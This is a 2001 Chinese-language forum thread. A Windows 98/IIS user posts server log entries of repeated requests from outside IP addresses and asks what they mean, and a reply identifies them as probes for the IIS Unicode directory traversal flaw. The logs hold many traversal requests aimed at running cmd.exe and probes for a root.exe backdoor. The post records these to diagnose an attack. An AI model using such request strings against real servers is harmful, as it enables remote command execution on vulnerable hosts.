★★重大发现★★

yinshao 2001-10-25 07:22:34
请关注【安全技术】里下面的帖子!

http://www.csdn.net/expert/topic/340/340295.shtm我的机器是WIN98系统+IIS
检查日志发现下面居然有规律的黑客扫描记录?
以下IP并不是我本地IP,难道是我的机器在自动扫描别人的IP?
我并没有使用任何工具!奇怪!请知情者给予解答和解决方法!
谢谢!重大发现

61.11.73.45 - - [19/Sep/2001:00:03:01 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 500 0
61.11.73.45 - - [19/Sep/2001:00:03:03 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 500 0
61.11.73.45 - - [19/Sep/2001:00:03:08 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 522
61.11.73.45 - - [19/Sep/2001:00:03:13 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 522
61.11.73.45 - - [19/Sep/2001:00:03:16 +0800] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:09 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:09 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:09 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 522
61.134.35.39 - - [19/Sep/2001:00:05:09 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 522
61.134.35.39 - - [19/Sep/2001:00:05:10 +0800] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:10 +0800] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:10 +0800] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 522
61.134.35.39 - - [19/Sep/2001:00:05:10 +0800] "GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:11 +0800] "GET /scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:11 +0800] "GET /scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:11 +0800] "GET /scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:11 +0800] "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:12 +0800] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:12 +0800] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:12 +0800] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:12 +0800] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
.......
这样的记录几乎我上网就有,而且IP不同!
后台究竟在运行什么?


...全文
26 1 打赏 收藏 转发到动态 举报
写回复
用AI写文章
1 条回复
切换为时间正序
请发表友善的回复…
发表回复
Miracle 2001-10-25
  • 打赏
  • 举报
回复
有人在逐个尝试你的系统是否有unicode控制字符漏洞

6,847

社区成员

发帖
与我相关
我的任务
社区描述
Windows 2016/2012/2008/2003/2000/NT
社区管理员
  • Windows Server社区
  • qishine
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧